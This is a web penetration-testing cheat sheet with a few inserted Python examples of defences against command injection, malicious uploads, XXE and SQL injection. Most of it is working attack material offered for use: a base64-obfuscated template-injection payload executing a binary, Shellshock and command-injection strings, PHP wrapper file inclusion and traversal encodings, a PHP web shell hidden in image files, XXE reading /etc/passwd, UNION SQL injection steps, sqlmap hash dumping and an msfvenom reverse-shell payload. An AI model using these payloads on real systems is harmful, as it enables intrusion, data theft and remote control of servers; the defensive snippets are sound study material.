nikto -h <website>
web server scanner
wapiti -u <website>
web server scanner
ettercap -G
--> add IP as target --> Mitm menu
http.request.url contains "login"
python3 -m http.server
ngrok http 8000
nmap <ip>
-sV
Service version
-O
Operating system
-v
verbose, shows more information about what it's doing
-p 21 80-90
Test specific ports
nmap -vv --reason -Pn -A --osscan-guess --version-all -p <ports> -oN <output file>
just does kind of everything
--script=<script name>
run a script
sslscan <website>
obtains information and shows common misconfigurations like Heartbleed
sslyze --regular <website>
gives complementary information
openssl s_client -connect <website>:443
shows SSL/TLS information
curl file:\\localhost\..\..\flag
127.0.0.1;uname -a
test@test.com {{range.constructor("return eval(Buffer('Z2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ2NkIC8gJiYgLi9yZWFkZmxhZycpLnRvU3RyaW5nKCk=','base64').toString())")()}}
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://<ip>/cgi-bin/test.sh
x='() { :;}; echo VULNERABLE' bash -c :
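Added example, not from the cheat sheet: the "127.0.0.1;uname -a" style payload above only works when user input is pasted into a command string that a shell parses. The constructed snippet below shows the vulnerable pattern (shell=True) beside the fix (an argument vector plus an allow-list check on the hostname); it uses echo so it runs anywhere. The function names, the hostname regex and the probe string are assumptions for the example.

```python
import re
import subprocess

# Added example (not from the cheat sheet). Sample inputs are constructed.
# Only characters that can occur in a hostname or IPv4 address are allowed.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def lookup_vulnerable(host: str) -> str:
    """shell=True: /bin/sh parses the string, so ';' starts a second command."""
    out = subprocess.run("echo host=" + host, shell=True,
                         capture_output=True, text=True)
    return out.stdout

def is_valid_host(host: str) -> bool:
    """Allow-list check applied before the value reaches any command."""
    return HOST_RE.match(host) is not None

def lookup_safe(host: str) -> str:
    """Argument vector: 'host' is a single argv entry, never seen by a shell."""
    if not is_valid_host(host):
        raise ValueError("rejected host: " + repr(host))
    out = subprocess.run(["echo", "host=" + host],
                         capture_output=True, text=True)
    return out.stdout

if __name__ == "__main__":
    probe = "127.0.0.1; echo INJECTED"        # constructed, mirrors the ';' trick above
    print(lookup_vulnerable(probe), end="")    # prints two lines: the injected echo ran
    print(is_valid_host(probe))                # False
    print(lookup_safe("127.0.0.1"), end="")    # host=127.0.0.1
```

When a shell really is required (pipes, globbing), shlex.quote on each value is the fallback, but the argv form removes the whole class of ";", "|" and "$(...)" tricks at once.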
<website>/robots.txt
tells search engines to not index these directories
?page=expect://ls
execution of system commands via the php expect wrapper
?page=php://input
your payload is sent in a POST request using curl
?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
base64 encoded
nmap --script ssl-poodle -sV -p 443 <ip>
%2e%2e%2f
is ../
%2e%2e/
is ../
..%2f
is ../
%2e%2e%5c
is ..\
%2e%2e\
is ..\
..%5c
is ..\
%252e%252e%255c
is ..\
..%255c
is ..\
..%c0%af
is ../
..%c1%9c
is ..\
?page=index.html%00.pdf
Website sees a html file, the OS a pdf file
http://website.com/get.php?get=/var/www/html/site.php
shell.php.jpg
passes the filter and the file is executed as php
GIF89a;
<?
system($_GET['cmd']);//or you can insert your complete shell code
?>
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
hexedit tacos.txt.jpg
first bytes FF D8 FF DB (JPEG)
89 50 4E 47 (PNG)
50 4B 03 04 (ZIP)
25 50 44 46 (PDF)
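Added example, not from the cheat sheet: an upload check that applies the magic bytes above and rejects each of the tricks listed (double extension, wrong signature, a PHP tag hidden after GIF89a; or in an EXIF comment). Sample uploads are constructed in memory; the function names, the allowed-extension set and the reason strings are assumptions for the example.

```python
import re

# Added example (not from the cheat sheet). Signatures are the magic bytes
# listed above; the sample uploads are constructed.
SIGNATURES = {
    "jpg":  (b"\xff\xd8\xff",),          # FF D8 FF (FF D8 FF DB, FF D8 FF E0, ...)
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG",),               # 89 50 4E 47
    "gif":  (b"GIF87a", b"GIF89a"),
    "zip":  (b"PK\x03\x04",),            # 50 4B 03 04
    "pdf":  (b"%PDF",),                  # 25 50 44 46
}
ALLOWED = {"jpg", "jpeg", "png", "gif"}
# '<?php', '<?=' or a bare '<?' followed by whitespace (short open tag)
PHP_TAG_RE = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)

def check_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason). Each check mirrors one trick from the list above."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "no extension"
    if len(parts) > 2:
        return False, "double extension"        # shell.php.jpg, tacos.txt.jpg
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(content.startswith(sig) for sig in SIGNATURES[ext]):
        return False, "magic bytes do not match extension"
    if PHP_TAG_RE.search(content):
        return False, "php tag inside file"     # GIF89a; <? ... ?> or an EXIF comment
    return True, "ok"

SAMPLE_UPLOADS = {   # constructed
    "photo.jpg":     b"\xff\xd8\xff\xdb" + b"\x00" * 16,
    "shell.php.jpg": b"\xff\xd8\xff\xdb" + b"\x00" * 16,
    "tacos.txt.jpg": b"hello, not a jpeg",
    "tacos.jpg":     b"hello, not a jpeg",
    "cat.gif":       b"GIF89a;\n<?\nsystem($_GET['cmd']);\n?>",
    "lo.jpg":        b"\xff\xd8\xff\xe1Exif\x00\x00<?php echo 1; ?>",
    "report.pdf":    b"%PDF-1.4\n",
}

def review(uploads: dict) -> dict:
    """Run the check over a batch of (name, bytes) pairs."""
    return {name: check_upload(name, data) for name, data in uploads.items()}

if __name__ == "__main__":
    for name, (ok, reason) in review(SAMPLE_UPLOADS).items():
        print(f"{name:16} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```

The tag scan is a heuristic; the durable controls are re-encoding every accepted image with an image library and storing uploads where the web server will not execute them.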
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo
[<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
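Added example, not from the cheat sheet: the defensive counterpart to the two XXE documents above. Untrusted XML is refused whenever it carries a DOCTYPE or ENTITY declaration, before any parser sees it, and the root element is checked against what the endpoint expects. The documents are constructed (the first reuses the file:///etc/passwd entity from above); the function and exception names are assumptions for the example.

```python
import re
import xml.etree.ElementTree as ET

# Added example (not from the cheat sheet). Both documents are constructed.
XXE_DOC = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds><user>&xxe;</user><pass>mypass</pass></creds>"""

BENIGN_DOC = b"""<?xml version="1.0"?>
<creds><user>alice</user><pass>s3cret</pass></creds>"""

# Any DTD is refused outright: data exchanged with a client never needs one,
# and this closes external entities and entity-expansion ("billion laughs") alike.
DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b")

class UnsafeXML(ValueError):
    pass

def parse_untrusted(data: bytes) -> ET.Element:
    """Reject DTDs before parsing, then parse with the standard library."""
    if DTD_RE.search(data):
        raise UnsafeXML("DTD or entity declaration in untrusted XML")
    return ET.fromstring(data)

def read_creds(data: bytes) -> tuple:
    """Return (user, pass) from a <creds> document, refusing anything else."""
    root = parse_untrusted(data)
    if root.tag != "creds":
        raise UnsafeXML("unexpected root element " + root.tag)
    return root.findtext("user"), root.findtext("pass")

def is_accepted(data: bytes) -> bool:
    """True when the document passes every check."""
    try:
        read_creds(data)
        return True
    except (UnsafeXML, ET.ParseError):
        return False

if __name__ == "__main__":
    print(read_creds(BENIGN_DOC))       # ('alice', 's3cret')
    print(is_accepted(XXE_DOC))         # False: refused before parsing
```

In production the defusedxml package gives the same protection with the ElementTree API (it refuses entity declarations out of the box); the explicit pre-check above is the portable version of that rule.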
john --stdout --wordlist=<cewlwordlist>
john --stdout --wordlist=<cewlwordlist> --rules > <output.txt>
import requests
URI = 'http://<website>'
r = requests.Session()
data = r.get(URI).text
import requests
cookies = {'enwiki_session': '17ab96bd8ffbe8ca58a78657a918558'}
r = requests.post('http://wikipedia.org', cookies=cookies)
wafw00f <website>
nmap --script=http-waf-detect
or http-waf-fingerprint
identify a web application firewall
Test<script>alert('XSS')</script>
cd /usr/share/beef-xss/ && ./beef
--> http://127.0.0.1:3000/ui/panel
SELECT select_list FROM table_name WHERE username = '' AND password =''
?debug=1
sqlmap -u "http://<website>?parameter=<parameter>"
--dbs
list the databases
--tables -D mydb
list the tables of the database mydb
--passwords
dump password hashes, which can then be attacked with a wordlist
--dump
dump the database tables
-b
print the DBMS banner
-h
print the help file
-hh
list all parameters and parameter options
1
produces a valid response
1'
--> O/E
and 1''
--> Response
<true parameter> and 1=1#
--> O/E
and <true parameter> and 1=1#
--> Response (Comment in SQL and MySQL)
<true parameter> and 1=1--
--> O/E
and <true parameter> and 1=1--
--> Response (Comment in SQL)
<true parameter> and name like a%
if a% is valid you can continue with aa%
<true parameter> order by 2--
if 2 is valid you have at least 2 columns
<true parameter> union select 1,2,3,4<etc. as many columns> from <tablename>#
or without table name: <true parameter> union select 1,2,3,4<etc.>#
<true parameter> union select 1,2,version(),4 from <tablename>#
<true parameter> union select 1,2,database(),4 from <tablename>#
<true parameter> union select 1,2,current_user(),4 from <tablename>#
<true parameter> union select 1,2,table_name,4 from information_schema.tables where table_schema=database() #
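Added example, not from the cheat sheet: the single-quote probe sequence above (1' gives an error, 1'' gives a response, and '1'='1 / '1'='2 toggle the result) reproduced against an in-memory SQLite table, with the string-concatenated query that makes it work beside the parameterised query that does not. The table, the one row and the function names are constructed for the example; SQLite is used because it ships with Python (it understands the -- comment but not the MySQL # comment).

```python
import sqlite3

# Added example (not from the cheat sheet): one constructed row in SQLite.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'correct-horse')")
    return conn

DB = make_db()

def probe(conn, username: str) -> str:
    """The quote probe from the list above: 'error', 'rows' or 'no rows'."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"        # the 1' case: unbalanced quote breaks the statement
    return "rows" if rows else "no rows"

def login_vulnerable(conn, username: str, password: str) -> bool:
    """String concatenation: quotes in the input become SQL syntax."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False

def login_safe(conn, username: str, password: str) -> bool:
    """Bound parameters: values travel separately from the SQL text,
    so a quote in the password is just a character in a string."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    for value in ["admin", "admin'", "admin''", "admin' and '1'='1", "admin' and '1'='2"]:
        print(f"{value!r:28} -> {probe(DB, value)}")
    print(login_vulnerable(DB, "admin", "x' or '1'='1"))   # True: bypass
    print(login_vulnerable(DB, "admin'--", "anything"))    # True: comment eats the password check
    print(login_safe(DB, "admin", "x' or '1'='1"))         # False
```

The probe output is also what to look for in error logs: a burst of failed statements from one client, each differing by a quote or a comment marker, is the enumeration sequence above in progress.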
id=1%20and%201=2%20union%20select%20load_file(0x2f6574632f706173737764),2,3,4,5,6,7,8%20from%20mysql.user--
index.php?usr[]
Warning: preg_match() expects parameter 2 to be string, array given
1' or 1=1 #
1'
--> no output
and 1''
--> output
1' and '1' = '2
--> always false, no result
and 1' and '1' = '1
--> always true if id 1 exists, result
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > payload.exe